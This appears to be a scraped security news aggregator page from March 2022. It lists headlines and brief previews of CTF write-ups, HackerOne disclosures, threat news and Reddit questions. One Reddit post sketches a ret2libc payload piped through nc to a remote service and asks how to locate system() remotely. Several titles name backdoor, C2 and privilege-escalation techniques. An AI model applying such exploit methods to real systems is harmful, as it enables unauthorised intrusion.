    Although I have already shared my experience and thoughts on red/blue adversarial mechanisms and building a blue team many times through different channels (blog, WeChat official account, public talks, etc.), today … Continue reading Thoughts on how to better present the value of red/blue adversarial exercises →

    TryHackMe writeup: Alfred
    Here, I will use Jenkins as a vector to gain initial access to a target system and then use token impersonation for privilege escalation. Continue reading on InfoSec Write-ups »
    OTP Bypass and Account Takeover at Hospital
    No content preview
    How I created an undetectable Backdoor for Windows — Ethical Hacking
    No content preview
    Baron Samedit CVE-2021–3156 [TryHackMe]
    No content preview

FreeBuf Morning Report | LAPSUS$ group breaches Microsoft DevOps account; dental care data breach may affect one million people
    The LAPSUS$ group breached Microsoft's DevOps account and claims it can access some of Microsoft's DevOps resources.
    “CryptoRom” scam targets mobile users
    Criminals lure victims into stock investments, gambling and the like in order to defraud them; this practice is known as "pig butchering" (杀猪盘).
    Hacker discloses source code of new Conti ransomware version on Twitter
    Recently, a hacker publicly disclosed the source code of a new version of the Conti ransomware on Twitter.
    Russia-linked InvisiMole group launches spear-phishing attacks against Ukraine
    The Computer Emergency Response Team of Ukraine (CERT-UA) says the UAC-0035 group launched spear-phishing email attacks against Ukrainian state agencies.
    Italian data privacy regulator opens investigation into Kaspersky
    The authority is verifying how the Russian security company actually handles the data of domestic users, and whether collected information is transferred to regions outside the EU.
    Giant killer: Lapsus$ extortion group claims to have breached Microsoft source code repositories
    In just a few months, the Lapsus$ extortion group has successfully breached NVIDIA, Samsung, Ubisoft, Mercado Libre, Vodafone and other well-known companies.
    Analysis of the “1337” cryptomining group's activity
    1. Overview: In early February 2022, Harbin Institute of Technology and Antiy jointly C

Exploring JVM Shellcode Injection
    Author: p1ay2win@天玄安全实验室 (Tianxuan Security Lab). Original link: https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A. Preface: With the development of RASP technology, ordinary webshells have little room left to operate, and even the various in-memory shells are gradually falling short. Following the "go lower" line of thinking from 《JSP Webshell那些事——攻击篇(上)》, is there a way to execute machine code from Java code? The answer is yes; the common inj...
    Serpent, No Swiping! New backdoor targets French entities
    Translator: Knownsec 404 Lab translation team. Original link: https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain. Key findings: Proofpoint identified a targeted attack in which the attacker used the open-source package installer Cho...

    MRI pictures
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    A lot of anime, movies and shows
    https://setnomanime.me/0:/ submitted by /u/Isolatedleliel [link] [comments]
    Very Large OD full of software
    submitted by /u/ilikemacsalot [link] [comments]

    What are the Best Security Testing Tools (Open Source)?
    Seeking a reliable security testing tool can be overwhelming, given how large the opsec environment has grown over these last few years. Given how large things have grown, it’s become common to overcharge people in the industry for security services provided. Due to this factor, it’s very beneficial for any small business or organization to consider their options in terms of free and open-source software available out there if on a budget. There are many free & open source security testing tools available out there, but the best places to look are with Github, reliable search engines, and within the infosec/opsec sphere of blogs and forums. Continue reading What are the Best Security Testing Tools (Open Source)? at Sucuri Blog.

    Blue Team Junior Analyst Review
    Entry level blue team training courses from Security Blue Team Continue reading on Medium »
Ukraine — Situation update, 22 March
    The last 24 hours Continue reading on Medium »

Gathering Information About a Target System or Systems
    Hello friends, in this article I will talk to you about the information-gathering phase regarding a target or targets and about information-gathering tools… Continue reading on Medium »
    Active Directory Certificate Services: Domain Dominance
    When I’m taking part in a penetration test or red team engagement, I love digging down into the intricacies of Active Directory… Continue reading on Medium »

    what are the resources or references pentesters use to find exploits on known vulnerabilities?
    Thanks in advance, after doing a vuln scan and detecting new vulns, what do you do next to get the resources or information needed to exploit the vulnerability? submitted by /u/rleekc [link] [comments]
    Managed Security Services Recommendation
    Does anyone have any recommendations for some reputable MSSPs? We have looked at Trustwave and SecureWorks so far. Trustwave can manage our firewalls for us, but they lack endpoint security, whereas SecureWorks does endpoint security, but they do not manage firewalls. I am really looking for a company that will manage Palo Alto firewalls as well as do endpoint security. submitted by /u/Thavus [link] [comments]
    Intel lists for Cracked Software / Warez domains?
Hey all, I had an idea about proactively ingesting lists of domains which are for cracked software / warez to block them in my proxy. While I could scrape search engines looking for sites, it would be easier if there was an intel list I could pull from daily that is already managed and kept up to date. Does anyone here know of such a list, or any better way to gather this data? Thanks submitted by /u/truedoom [link] [comments]
    AAA
    Hello everybody! I am new to the AAA server (ISE) and I would be thankful if you can suggest some videos that can explain it clearly for me as a beginner! Thank you. submitted by /u/Murky_Fee5417 [link] [comments]
    Best throwaway email service?
I'm looking for an email service that allows you to create an email address and use it for either sending emails briefly, using it to create an account that won't last long, or so on. I swear ProtonMail used to have a feature where email addresses can self-destruct after a pre-determined amount of time, but I am not seeing this feature today. Can anyone recommend a good service that works like the above? submitted by /u/JamieOvechkin [link] [comments]

    Unconstrained Delegation
    submitted by /u/netbiosX [link] [comments]
    Shielder - Reversing embedded device bootloader (U-Boot) - p.2
    submitted by /u/smaury [link] [comments]
    CVE-2022-0811 : New Vulnerability in CRI-O Engine Lets Attackers Escape Kubernetes Containers
    submitted by /u/Late_Ice_9288 [link] [comments]

    Initial access via rtlo attack
    submitted by /u/exandroiddev [link] [comments]

    Unconstrained Delegation
Microsoft, to support scenarios where users authenticate via Kerberos to one system and information needs to be updated on another system, implemented unconstrained delegation. This… Continue reading → Unconstrained Delegation

    Log4j Java RCE in [beta.dev.adobeconnect.com]
    Adobe disclosed a bug submitted by sheikhrishad0: https://hackerone.com/reports/1442644
    Arbitrary file read via the bulk imports UploadsPipeline
    GitLab disclosed a bug submitted by vakzz: https://hackerone.com/reports/1439593 - Bounty: $29000
    Get all personal email IDs of Glassdoor users[No user interaction required]
    Glassdoor disclosed a bug submitted by safehacker_2715: https://hackerone.com/reports/864783 - Bounty: $1500

    SecWiki News 2022-03-21 Review
Fifty Years of Ups and Downs: The Evolution of Malware by Avenger; A Few Lessons on Writing an Information Security Plan by ourren. For more of the latest articles, visit SecWiki

    OSINT — L’espion
    No content preview
    TryHackMe: Chocolate Factory Write-up
    No content preview
    What is Distributed Tracing and How does it work?
    No content preview

    Log Sources for Digital Forensics: Windows and Linux
    submitted by /u/ogunal00 [link] [comments]
    APT35 Automates Initial Access Using ProxyShell
    submitted by /u/TheDFIRReport [link] [comments]

FreeBuf Morning Report | UK NFT scams surged 400% in 2021; South Korean hacking group attacks Macau hotels
    The FBI has issued a joint cybersecurity advisory warning of AvosLocker ransomware attacks against multiple US critical infrastructure sectors.

    Western Digital EdgeRover App: Elevated Privileges Windows, macOS CVE-2022-22998
    Article URL: https://www.bleepingcomputer.com/news/security/western-digital-app-bug-gives-elevated-privileges-in-windows-macos/ Comments URL: https://news.ycombinator.com/item?id=30749920 Points: 2 # Comments: 0

In-depth analysis of a new reflection attack based on the tp240dvr service
    Author: Baidu Security Lab. Original link: https://mp.weixin.qq.com/s/YCu8e6qkrq_3AxhVRd5ygQ. 0x00 Overview: In February 2022, Cloudflare first disclosed a new type of reflection amplification attack in which attackers abuse the tp240dvr service (also known as the TP-240 driver), with an amplification factor exceeding 4 billion; several security teams in China and abroad have since published analyses of this class of attack. After noticing these attacks, Baidu 智云盾 (Zhiyundun) carried out an in-depth analysis, and we confirmed...

Pages banned by other pages are still able to take action on an event (comment + post)
    Vuln Type Privacy / Authorization Continue reading on Medium »
Wombat Exchange Bug Bounty Program Officially Launched
    Win bounties of up to US$100,000! Continue reading on Wombat Exchange »
    Insecure Direct Object Reference
    Let us learn about IDOR Continue reading on Medium »
    What Is A Bug Bounty Program?
    Companies spend a part of their budget in different areas such as marketing to improve their position and people’s opinion, but there is… Continue reading on Medium »
Ultimate and advanced way to find XSS!
    What is XSS? Continue reading on Medium »
    fstScan — Massive Vulnerability scanner.
fstScan is the fastest tool to scan an entire website. Continue reading on Medium »
    Launching Wombat Exchange Bug Bounty Program
    Get up to US$100,00 in Rewards! Continue reading on Medium »
    A Study of Double-Write Bypass for SQLMap — Tamper
    Introduction Continue reading on Medium »
    Broken session control leads to access private videos using the shared link even after revoking the…
    A lot of people might know how to share the private video and can access that video but here the interesting thing is now this… Continue reading on Medium »
    Top Ethical Hacking Tools and Software for 2022
A detailed blog on the top hacking tools used by skilled hackers! Continue reading on InfoSec Write-ups »

    Linux EDR testing: simple to extend but realistic initial access test case and ideas where to focus when testing
    submitted by /u/4lreadytekken [link] [comments]
    GitHub - fgsect/FitM: FitM, the Fuzzer in the Middle, can fuzz client and server binaries at the same time using userspace snapshot-fuzzing and network emulation. It's fast and comparably easy to set up.
    submitted by /u/domenukk [link] [comments]
    Xepor: the web routing framework, brings the best of mitmproxy & Flask
    submitted by /u/ttimasdf [link] [comments]

    Testing EDRs for Linux — Things I wish I knew before getting started
    Thoughts on how to simplify your tests while keeping it real and a realistic, easy to expand initial access case. Continue reading on Medium »
    LOLBINed — 360TotalSecurity (360AdvToolExecutor.exe)
    Very Total, Much Security Continue reading on Medium »

Ukraine — Situation update, 21 March
    The last 24 hours Continue reading on Medium »
    Recon-ng: Powerful Reconnaissance Tool
    Introduction Continue reading on Medium »
    A Sneak Peek into the Forbidden State: Exploring the CyberSpace of North Korea
    [0x0] The Beginning Continue reading on Medium »
    THE ART OF SOCK PUPPET
    Sock Puppet is an alternative online identity or in simple words it’s a Fake account Continue reading on Medium »
    OSINTGRAM : Gather Instagram Target Information (Step-by-Step Guide)
    In this guide I will be showing you how to install and use the functions of Osintgram in Kali Linux. Continue reading on System Weakness »
    US defense budget allocation for language interpretation
    https://www.youtube.com/watch?v=sr54QBU2lBc Continue reading on Medium »

    Fully understand SYN Flood (TCP backlog and other stuff)
Hey, I have multiple questions about the subject: I do know what port states are (like LISTEN, SYN_RECEIVED, ESTABLISHED, etc.), but I don't understand exactly how the TCB queue works with them. Does the kernel open a new TCB every time the port state needs to be changed, or something else? If so, does it necessarily need to be a SYN attack? It can also be an "ACK" attack or any other state-name attack. I think the only advantage is that SYN is faster to send in massive traffic. I didn't understand if today the famous OSes like RedHat Linux, Windows Server, Windows Home, etc. limit the backlog by default or not; I saw different sources say different things. Do organizations usually limit the TCP backlog manually (I know it depends), or just trust third-party systems like F5's BIG-IP? Is IP and port spoofing necessary for the attack? The victim's OS won't create a new TCB if I don't change my socket? If clause 2 is right, do third-party solutions also implement the same method as SYN cookies for any other possible state? Thanks! submitted by /u/Webly99 [link] [comments]
    What should I use to share secret with someone of another company (client) ?
    In this case I can't have physical access to the person. submitted by /u/that_random_bear [link] [comments]
    Guide for how to design an account system?
    My company is overhauling its customer account system for our website, moving from simple username and password to having some form of 2FA. Now’s also a good time for us to go through all of our policies, such as the process for password reset, what to do if a customer no longer has access to their email, what to do if they no longer have access to their second-factor, if their phone number changed and they forgot to update it… lots of little questions that go into having a secure account system. Is there a book or long guide with current industry best practices? Thanks. submitted by /u/tvtb [link] [comments]

    SecWiki News 2022-03-20 Review
Using Abstract Syntax Trees to Mine Usable Fastjson Gadgets by ourren; Attacking Kubernetes via gateway-api by ourren. For more of the latest articles, visit SecWiki

    Creating a reverse C2 channel using powershell c# and python
    https://www.youtube.com/watch?v=Yoj0bQkIRqU submitted by /u/luzunov [link] [comments]

    Courtesy of Republic of Bulgaria! - Part Three
The nukes are coming! The nukes are coming! Enjoy! Related posts: Courtesy of Republic of Bulgaria! - Part Two; Courtesy of Republic of Bulgaria!; A Profile of a Bulgarian Dipshit and a Kidnapper - An OSINT Analysis; An Update on My Disappearance and Kidnapping Attempt Courtesy of Bulgarian Law Enforcement Officers from the City of Troyan Bulgaria Circa 2010 - An Analysis; What You Get From "Peasant-aria

    Dirty Pipe Vulnerability in Linux
    Article URL: https://dietpi.com/blog/?p=1379 Comments URL: https://news.ycombinator.com/item?id=30741595 Points: 2 # Comments: 0

    MyEnv := ZAP+Proxify+Burp
What tools do you use when doing security testing? I use ZAP as my main tool and Burp Suite as a secondary scanner. In my last post of 2021 ("나의 메인 Weapon 이야기", the story of my main weapon) I mentioned Proxify. Today I want to talk about the new analysis environment I am setting up using Proxify, the reasons for it, and what more I hope to gain through it. Why: First, let me explain why I want to change my analysis environment. I have long known the need to reuse the data used in analysis. So I thought about it in many ways, but only overly large and complex designs came out; there was never one that could be built and actually used well.

    Bulk Extractor showing Explicit Websites
Howdy all, okay, so whilst I was going through my client's data I found some explicit websites in the domain_histogram result from Bulk Extractor! Now, the thing that has me awake is, the same link was available on all hosts! So, I downloaded a fresh ISO image from the official Windows link, made a virtual machine and captured its RAM! Found the same links xD I've no idea what is happening or how. Any leads anyone can help me with? submitted by /u/GloryHunter9 [link] [comments]

    RXSS
    SecurityScorecard disclosed a bug submitted by ww1: https://hackerone.com/reports/1418413
    Insecure crossdomain.xml on https://vdc.mtnonline.com/
    MTN Group disclosed a bug submitted by xlife: https://hackerone.com/reports/838817
    Exposed .bash_history at http://21days2017.mtncameroon.net/.bash_history
    MTN Group disclosed a bug submitted by xlife: https://hackerone.com/reports/801437


    Frelatage: A fuzzing library to find vulnerabilities and bugs in Python applications
    submitted by /u/FrenchFuzzer [link] [comments]

Ukraine — Situation update, 20 March
    The last 24 hours Continue reading on Medium »
    OSINT — L’espion
    This short article presents my solution to the CTF challenge titled “L’espion”, an open source intelligence (OSINT) challenge available on… Continue reading on InfoSec Write-ups »
    Searchlight — IMINT
    Hello, blue teamers, Continue reading on Medium »
    HacktoriaWalkthrough — Hacktoria: Geolocation 27
    This time I´m gonna write another Writeup about Geolocation: Continue reading on Medium »
Berlin's ugliest business centres: where the Verfassungsschutz rents offices
    The Bundesamt für Verfassungsschutz operates cover agencies in Germany to make its offices and activities as hard to trace as possible… Continue reading on Medium »

    RAM Memory Analysis volatility
Hi, I want to perform an analysis of the RAM of an Android phone using Volatility, and for this I have a .bin file, a "System.map" and a "module.dwarf". The tool I have to use is Volatility and I am not able to set the profile using the previous files to perform the analysis. Can someone please help me? Thanks submitted by /u/Zealousideal_Ad601 [link] [comments]
    Falcon Neo - Imaging
    Can someone let me know how Falcon Neo reads/detects the connected source drive? submitted by /u/Pepperknowsitall [link] [comments]

    Parent PID Spoofing (Mitre:T1134)
    Introduction Parent PID spoofing is an access token manipulation technique that may aid an attacker to evade defense techniques such as heuristic detection by spoofing The post Parent PID Spoofing (Mitre:T1134) appeared first on Hacking Articles.

    Findsecret
Hello friends. Today I will introduce a tool I developed using the Go programming language. Continue reading on Medium »
    Echidna Bug Bounty Program
    Earn bounties of up to $50,000 Continue reading on Medium »
    Metasploit
    Anatomy and Structure of Metasploit; Basic commands and configuration; Scanning services with Metasploit; Meterpreter basics Continue reading on Medium »
    BugBounty: H T M L Injection
    (Do you want to create your own hacking tools? Do you want to create a tool that can be undetectable by antivirus, can hack any windows… Continue reading on Medium »
    Web Hacking: A drama
    Part-One: An arrogant web app. Continue reading on Medium »

    SecWiki News 2022-03-19 Review
No news updated today yet. For more of the latest articles, visit SecWiki

    Browser in the Browser
    submitted by /u/dmchell [link] [comments]

    Where to focus further learning?
Working in cyber I realized my knowledge is an inch deep and a mile wide when it comes to technology. I've earned my ECIH, Sec+ and recently provisionally passed my CISSP. I have only 4 years' experience and am in a security management role. I definitely feel like I have imposter syndrome at times and want to build my technical knowledge, but there is just SO much out there to learn. Where do you feel it's most important to focus attention when leading an IR/Blue Team? My overall goal is to advance in cyber/IT management by landing a director role and, more long term, CISO. Any thoughts or advice here? submitted by /u/gnomeparadox [link] [comments]
    Find hostnames in DNS records
I'm doing a penetration test; I've tried brute-forcing the customer's domain to find hostnames. I'm sure there are others that exist but I can't find them. They are a fairly global company. I know they'll have users and customers all over the world requesting various apps. Is there a way to identify hostnames through public sources? I mean, is there a DNS server (like 1.1.1.1) that discloses the DNS records people have requested? Or something like this? submitted by /u/InternalCode [link] [comments]
  • Open

    Asking for help
    Hello guys, could you recommend me some learning material or a roadmap, as I want to learn exploit development, what to learn, etc. Thank you in advance. submitted by /u/Shokhjakhon23235 [link] [comments]
    Exploit dev on Windows Subsystem for Linux 2 possible?
    Hello all. I have a question for which I cannot find information on Google. I would like to learn how to write simple exploits for Linux and I wonder if I can do it using WSL2; is this technology suitable for Linux exploit development training? Thanks submitted by /u/JunkieChunkie [link] [comments]
  • Open

    FreeBuf Morning Report | Phishing software exploits the invasion of Ukraine to obtain cryptocurrency; Europe warns of aircraft GPS disruptions linked to the Russian invasion
    CISA and the FBI said today that they are aware of "possible threats" to satellite communication networks in the United States and around the world.
  • Open

    CVE-2022-27226: CSRF to RCE in iRZ Mobile Routers through 2022-03-16
    Article URL: https://johnjhacking.com/blog/cve-2022-27226/ Comments URL: https://news.ycombinator.com/item?id=30730055 Points: 2 # Comments: 0
  • Open

    LOLBINed — CyberGhost VPN (PeLauncher.exe/Dashboard.exe)
    Ghostbusters Continue reading on Medium »

  • Open

    How to find phishing websites with the favicon hash
    Bug bounty uses the favicon's hash to find vulnerable websites. Different versions of software sometimes have different favicon… Continue reading on Medium »
    Software: Uncover
    In an article published on blackhatethicalhacking.com we’re introduced to the nifty tool Uncover. Continue reading on Medium »
    Ukraine — Situation update as of 19 March
    The last 24 hours Continue reading on Medium »
    Walkthrough — Hacktoria: Geolocation 24
    This morning I decided to make a Geolocalization exercise in Hacktoria. Continue reading on Medium »
  • Open

    PIN BYPASS
    Yoti disclosed a bug submitted by ww1: https://hackerone.com/reports/1257586 - Bounty: $1000
    Military name,email,phone,address,certdata Disclosure
    U.S. Dept Of Defense disclosed a bug submitted by unknownsh: https://hackerone.com/reports/1490133
    CVE-2020-3452 on https:///
    U.S. Dept Of Defense disclosed a bug submitted by pirneci: https://hackerone.com/reports/1455257
    Arbitrary File Deletion (CVE-2020-3187) on
    U.S. Dept Of Defense disclosed a bug submitted by pirneci: https://hackerone.com/reports/1455266
    CSRF - Modify User Settings with one click - Account TakeOver
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/799895
    Reflected XSS - in Email Input
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/799839
    IDOR - Delete Users Saved Projects
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/800608
    CSRF - Delete Account (Urgent)
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/799855
    CVE-2021-42567 - Apereo CAS Reflected XSS on https://
    U.S. Dept Of Defense disclosed a bug submitted by 3th1c_yuk1: https://hackerone.com/reports/1446236
    XSS because of Akamai ARL misconfiguration on
    U.S. Dept Of Defense disclosed a bug submitted by pirneci: https://hackerone.com/reports/1305477
    RCE .api/nr/report/{id}/download
    Mail.ru disclosed a bug submitted by mkhazov: https://hackerone.com/reports/1348154 - Bounty: $1000
    XSS Stored on https://seedr.ru
    Mail.ru disclosed a bug submitted by fallenskill: https://hackerone.com/reports/1350671
    OS command injection on seedr.ru
    Mail.ru disclosed a bug submitted by fallenskill: https://hackerone.com/reports/1360208 - Bounty: $1000
    SSRF + RCE fastCGI POST /api/nr/video
    Mail.ru disclosed a bug submitted by mkhazov: https://hackerone.com/reports/1354335 - Bounty: $1000
  • Open

    some ODs with various fonts
    http://www.hixie.ch/resources/ https://mirrors.cloud.tencent.com/adobe-fonts/ http://www.paulvlachou.com/fonts/ http://somospixel.com/fonts/ submitted by /u/subwaytech [link] [comments]
    Is the mega discord gone? If so does anyone have a link? Also I'm sorry if this is the wrong subreddit for this but I thought this is where I found it initially. Thanks
    submitted by /u/taramj13 [link] [comments]
    How to deploy API to Netlify
    The API I have works fine locally, but it keeps failing when I try to deploy to Netlify. I keep getting this error: node:internal/url:552 5:51:22 PM: throw new ERR_INVALID_URL(input); 5:51:22 PM: ^ 5:51:22 PM: TypeError [ERR_INVALID_URL]: Invalid URL 5:51:22 PM: at new NodeError (node:internal/errors:371:5) 5:51:22 PM: at onParseError (node:internal/url:552:9) 5:51:22 PM: at new URL (node:internal/url:628:5) 5:51:22 PM: at Function.parseURL (/opt/build/repo/node_modules/@node-redis/client/dist/lib/client/index.js:113:76) 5:51:22 PM: at Commander._RedisClient_initiateOptions (/opt/build/repo/node_modules/@node-redis/client/dist/lib/client/index.js:294:36) 5:51:22 PM: at new RedisClient (/opt/build/repo/node_modules/@node-redis/client/dist/lib/client/index.js:77:148) 5:51:22 PM: at new Com…
  • Open

    Insecure Direct Object Reference Exposes all users of Microsoft Azure Independent Software Vendors
    Hi Everyone, Continue reading on Medium »
    For the first Bounty, it takes a few challenging months, but only a few days for the second.
    Good day, everyone! I spent nearly three hours looking for this bug, but it took me three months to uncover the bug that brought me my… Continue reading on Medium »
    How to Create Your Own Nuclei Template: Part 1 (Indonesia Version)
    Let me introduce myself: my name is Muhammad Daffa, a student at a campus in Surabaya. I am currently working part time as… Continue reading on Medium »
    Adobe bug bounty using IDOR, Confidential data leaks
    I hacked adobe using IDOR, and got this Continue reading on Medium »
    WardenSwap x Immunefi: Launching a Bug Bounty Program with a reward of up to $100,000 USD.
    WardenSwap aims to give rewards to white hats who uncover bugs in our smart contracts and/or vulnerabilities in our protocols by working… Continue reading on WARDEN Official »
    subNum
    Crawl all URLs and check for subdomain takeover vulnerability. Continue reading on Medium »
    I got Premium Hacking and Bug Bounty Courses *FREE*
    Yes, Yes, Yessssss! I got many, I think more than 1000+ premium ethical hacking and bug bounty courses FREE. Only you have to spend your… Continue reading on Medium »
    Bypass confirmation to add payment method.
    Summary: Continue reading on Medium »
  • Open

    Scans for Movable Type Vulnerability (CVE-2021-20837)
    Article URL: https://isc.sans.edu/forums/diary/Scans+for+Movable+Type+Vulnerability+CVE202120837/28454 Comments URL: https://news.ycombinator.com/item?id=30725737 Points: 1 # Comments: 0
  • Open

    Computer scientist identifies JavaScript vulnerability in thousands of websites
    Article URL: https://hub.jhu.edu/2022/03/14/computer-scientist-identifies-javascript-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30725274 Points: 13 # Comments: 1
  • Open

    XSS Weakness(JSON XSS) to Valid XSS
    Today I want to talk about how to turn an XSS weakness into a triggerable XSS. It is not a new technique, and it is a trick everyone has been using for a long time, but come to think of it I have never written it up separately, so I am taking this opportunity to leave it as a post. So let's begin 🔥 XSS Weakness During XSS testing we sometimes find a reflection where the Content-Type is JSON. This is something ZAP and Burp Suite also check for, through Active/Passive Scan and so on. Alert (Rule) ZAP Cross Site Scripting Weakness (Reflected in JSON Response) Burpsuite Cross-site scripting (reflected) / Info Naturally, detection by the tools is informational only, and unless there is a pattern that clearly bypasses the filtering, these are items that get discarded.
    [Cullinan #29] Update 3 Pages
    This is Cullinan log #29. There were updates within DOM Clobbering, ZAP and Command Injection. Update DOM Clobbering (Add zap script) Update ZAP (Update build snippet) Update Command Injection (Add bypass technic with OOB)
  • Open

    SecWiki News 2022-03-18 Review
    A Brief Discussion of Data Security by ourren; Implementing DevSecOps for Microservice-Based Applications Using a Service Mesh by ourren; The Little Secret of How Just Browsing a Web Page Can Leak Your Phone Number by ourren; Attack Surface Management (ASM): Technical Explanation and Implementation by ourren; Penetration Records of the Three ATT&CK Red Team Evaluation Ranges by ourren; B1txor20, a Linux Backdoor Using DNS Tunnel Technology by ourren; ApolloScanner: An Automated Cruising Scan Framework by ourren; A First Look at the CommonsCollections Exploit Chain in Java by ourren; 2021 Xihu Lunjian IoT RW Write-Up by ourren. For more of the latest articles, visit SecWiki
  • Open

    0d1n - Tool for automating customized attacks against web applications. Fully made in C language with pthreads, it has fast performance.
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    0d1n
    Tool for automating customized attacks against web applications. Entirely made in C language with threads, it has fast performance. https://github.com/CoolerVoid/0d1n submitted by /u/CoolerVoid [link] [comments]
  • Open

    Pentesting: The Relevance, Top 10 Tools, And More
    No content preview
  • Open

    Brooklyn 99 CTF - Process and Report
    Lab Goals. This one is a standard “capture the flag” style box with no other goals, so you’re on your own to figure out the methodologies. Continue reading on Medium »
  • Open

    SolarWinds issues a warning about attacks targeting Web Help Desk users
    Recently, software developer SolarWinds warned users that installing unpatched Web Help Desk software may expose them to the risk of cyberattacks.
    FreeBuf Enterprise Security Group Topic Discussion | Talking about building an enterprise SOC platform
    How do you clarify the relationships and organization among SOC-related services and products, and how should they work together to achieve maximum efficiency?
    Analysis Report on the Application of Anti-Fraud Technology in Digital Finance (2021)
    Against the backdrop of a new round of technological revolution and industrial transformation, the wave of digitalization in the financial industry is surging; new technologies such as big data, artificial intelligence and cloud computing are deeply integrated with financial business, and digital transformation has become the financial industry's common choice for improving service quality and competitiveness.
    FreeBuf Weekly | The 3.15 Gala sets up a security lab for the first time to address information security; Android banking trojan Escobar is waiting for its chance
    This year's 3·15 Gala set up an information security laboratory for the first time and tested two products, attracting widespread attention.
    Security Lecture Hall | Tan Xiaosheng: Security as a Service, new cybersecurity opportunities in the age of the Internet of Everything
    Where is the road to commercializing cybersecurity?
    ASUS warns of Cyclops Blink malware attacks targeting routers
    Cyclops Blink can establish a persistent connection to the attacker on the target device, enabling remote access to the infected network.
    Anonymous hacker collective declares it will continue to support Ukraine against Russia
    The Anonymous hacker collective and its affiliates declared that they will continue to launch cyberattacks against Russian government and private organizations.
    Microsoft will completely retire the Internet Explorer browser in June
    Microsoft reminded Windows users today that it will retire the Internet Explorer browser from some Windows 10 editions in June this year.
  • Open

    Decrypt using OpenSSL
    Hi there people, I'm trying to decrypt a salted des3 file using openssl: openssl des3 -d -salt -pbkdf2 -in file.des3 -out file.txt -k password But it shows me the next error: bad decrypt 140292356945280:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt Can you guys figure out what is wrong with the command or am I using smth already deprecated? Thank you all submitted by /u/TaryG19 [link] [comments]
  • Open

    Zones and conduits in accordance with IEC 62443 standards
    There are several high-level reference models proposed by different sources and industry leaders to assist in the initial definition and separation of zones and conduits, such as: the DuPont Reference Architecture, the Tofino Security high-level model, the Honeywell Reference Architecture, the Rockwell Reference Architecture, and the Siemens Reference Architecture. How is each model being used in industrial automation and control systems to define and separate zones and conduits in accordance with IEC 62443 standards? submitted by /u/Economy-Function-337 [link] [comments]
    Finding ret2Libc's system() address on a remote machine. I need help utilizing extra information.
    I have a similar problem as this StackExchange question. I have the following scenario: a vulnerable program running on a server that can be accessed using netcat. I have a copy of that program locally and I can exploit it locally using ROP: ./vuln garbage + &system() + &exit() + &"/bin/sh" Now I want to exploit it remotely, so technically I would be executing this command: echo -e "garbage + &system() + &exit() + &/bin/sh" | nc host port My problem is: I do not know what &system() is on the remote machine. Is there any way to get it without brute force, i.e. trying all memory addresses from 0x00000000 -> 0xFFFFFFFF? BUT, in my case, there is some extra information given. Every time, the program also prints the buf address like this: Enter a string: Here's a clue! The address of buf is 0xffffdc0c But I don't know how to utilize this piece of information. How do I use this? submitted by /u/reddotname [link] [comments]
    Kaspersky alternatives?
    Well, with the warning that the BSI put out alerting users that Kaspersky could possibly be compromised (either now or in the future), my company is looking for alternatives for their antivirus software. We'll probably begin the process of evaluation next week but I wanted to get a head start and hear some of the netsec community's opinions on alternatives to Kaspersky. We are in the process of becoming ISO 27001 compliant, so every procedure is under extreme scrutiny and requires extensive documentation. Some current candidates are Sophos, Bitdefender and Trend Micro. What are your thoughts on ease of deployment, cost, security and privacy policies of the aforementioned alternatives? Any other suggestions for alternatives? Any comments or suggestions are greatly appreciated, thanks. submitted by /u/Goldsound [link] [comments]

  • Open

    Random number generator enhancements for Linux 5.17 and 5.18
    submitted by /u/zx2c4 [link] [comments]
    Post auth RCE based in malicious LUA plugin script upload SCADA controllers located in Russia
    submitted by /u/bertinjoseb [link] [comments]
    Detecting Headless Chrome: Spotlight on Puppeteer-Extra-Plugin-Stealth
    submitted by /u/threat_researcher [link] [comments]
    Unraveling Assets from Android Apps at Scale - An OSINT API allows you to scan over half a million Android apps for subdomains, S3 buckets, URL Params and more.
    submitted by /u/alt-glitch [link] [comments]
    Mitigating CVE-2022-0811: Arbitrary code execution affecting CRI-O
    submitted by /u/MiguelHzBz [link] [comments]
  • Open

    Is this networking knowledge enough ?
    Does learning how to manage a network, network simulation with GNS3, and installing a physical network have anything to do with security? I can't deal with GNS3 but I can use Packet Tracer. But what I am asking is whether it is enough to learn about the protocols, routing, IP addressing, and the TCP/IP stack if I want to work in penetration testing, or should I use a network simulator and dig deeper? I feel that practicing through HTB and THM teaches me more now that I have learned the fundamentals. And when I am stuck with something like Active Directory I just go into a room in THM or read about it. submitted by /u/Ramseesthe4th [link] [comments]
    HTTP 'PUT' method is enabled on Printer's Web Server
    Hey everyone, I'm a new infosec analyst and I've been tasked to run a vulnerability scan against our company's printers. Our scanner found that the HTTP 'PUT' method is enabled on several of our printers' web servers. How would I go about remediating this vulnerability if it's an HP Embedded Web Server? Right now, there is zero access control configured to log into the web server. Would enabling that help fix the vulnerability? I don't see anywhere in the server settings to disable the method. Thanks so much! submitted by /u/Zgame200 [link] [comments]
    Advice for an security analyst interview at a bank?
    Background about me: a few years of low-level SOC work, mainly just looking at alerts and logs, vuln scanning. Honestly, I don't really do much. About the position: not entry level; the requirements look pretty heavy. It seems to be a mix of both technical (alerts, incident response, playbooks, risk assessment, threat analysis, vulnerability, backups, pentesting, and more) and GRC stuff. The technical stuff I have familiarity with, mostly, but little practical experience. GRC/compliance stuff I have no experience with whatsoever and have no clue what to study. Do I just familiarize myself with a bunch of standards like ISO 27001? Anyone have experience interviewing or working at a bank? Looking for general tips or guidance on how to prepare for this interview. Thanks! submitted by /u/mygumsaredying [link] [comments]
    Is a cloud provider considered to be a Data Steward or a Data Custodian?
    Help me settle a debate. Is a cloud provider considered to be a Data Steward or a Data Custodian? My vote is they are the Data Steward. A colleague insists they are the Data Custodian. Either way, they have shared responsibility, but again, I'm looking to make sure to use the correct terminology. submitted by /u/paulexander [link] [comments]
    ELI5 Investigating a Suspicious Website
    Can someone walk me through how I would investigate a URL that’s been flagged as suspicious? a good example: omnatuor[.]com submitted by /u/annonuk2020 [link] [comments]
